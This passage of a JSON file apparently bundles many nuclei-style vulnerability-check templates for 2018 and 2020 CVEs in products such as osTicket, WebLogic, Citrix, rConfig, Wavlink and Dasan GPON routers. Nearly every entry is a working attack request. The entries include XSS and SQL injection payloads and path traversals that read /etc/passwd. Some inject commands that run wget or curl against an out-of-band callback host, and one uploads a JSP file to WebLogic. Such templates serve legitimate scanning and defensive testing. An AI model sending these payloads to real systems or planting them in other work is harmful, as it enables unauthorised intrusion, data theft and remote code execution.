/admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7193","info":{"name":"osTicket < 1.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /scp/directory.php?&&order=\"><script>alert(document.domain);</script>&sort=dept HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"\\\"><script>alert(document.domain);</script>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-7314","info":{"name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{num}})))-- X"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-7192","info":{"name":"osTicket < 1.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /ajax.php/form/help-topic/1?a934f512c6644b03=&message=dgh7r%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20qavj5 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"dgh7r onmouseover=alert(document.domain) style=position:\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://oast.me","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://oast.me'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'"]}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12256","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /devicemgmt.php?deviceId=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/eventON/"]}]},{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-12124","info":{"name":"WAVLINK WN530H4 live_api.cgi - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"word","part":"body","words":["WiFiBand"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-14882","info":{"name":"Oracle Weblogic Server - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<clipermission></clipermission>\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11441","info":{"name":"phpMyAdmin 